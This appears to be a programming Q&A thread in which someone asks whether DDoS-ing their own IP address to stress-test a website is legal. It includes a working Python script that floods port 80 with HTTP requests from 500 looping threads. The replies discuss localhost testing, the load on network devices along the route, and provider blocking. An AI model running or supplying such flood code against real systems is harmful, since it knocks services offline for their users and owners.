# Is it legal if I only DDoS my IPv4 address?

Tags: python, ddos

Is my IPv4 private just to me and only devices on my network get slower service if I start a DDoS?

I'm trying to test my website and taking port 80 just to see if it slows my website or takes it down, just wanna know if my IPv4 address is legal to use and does not affect anyone, please let me know thanks!

This is my code anyway:

```
import socket
import threading

target = '123.123.123.123'
port = 80
fake_ip = '123.123.123.123'

def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
        s.close()

for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()


attack_num = 0

def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
        
        global attack_num
        attack_num += 1
        print(attack_num)
        
        s.close()
```

Comment: using `localhost` would probably be a better idea so the traffic doesn't leave the box

Comment: I’m voting to close this question because this is not a software development question as defined in the [help]. The community cannot give a definitive answer to a question that asks "Is it legal...", merely opinions.

Comment: is it fine to use ```target = 'localhost'
port = 80``` though?

Comment: I would expect it to be legal, but I / we can't tell you for sure.  (Probably even a practicing lawyer couldn't give you a definitive answer that applies everywhere.)  And it is probably not the only question you need to ask ...

Answer (score 1, accepted):

Whether it's "IPv4" doesn't really matter. What matters is what network devices are between the network node you initiate the DDoS from and the machine you're DDoS-ing.

For example, if you connect to one computer from another and they are connected via a switch, that switch will have to carry the load as well. Similarly, if you're connecting over Wifi, the wifi network will see all the traffic.

Consider what route your attack will take and keep in mind that, depending on the type of attack you're testing, all the intermediate devices may suffer.

Since you're only hammering port 80, it's probably not as bad as it could be, but it's still wise to make sure you're not getting in the way of normal traffic.

Answer (score 0):

If it's your device then yes, but only use devices in your local network! Your provider will block you if you did something over their net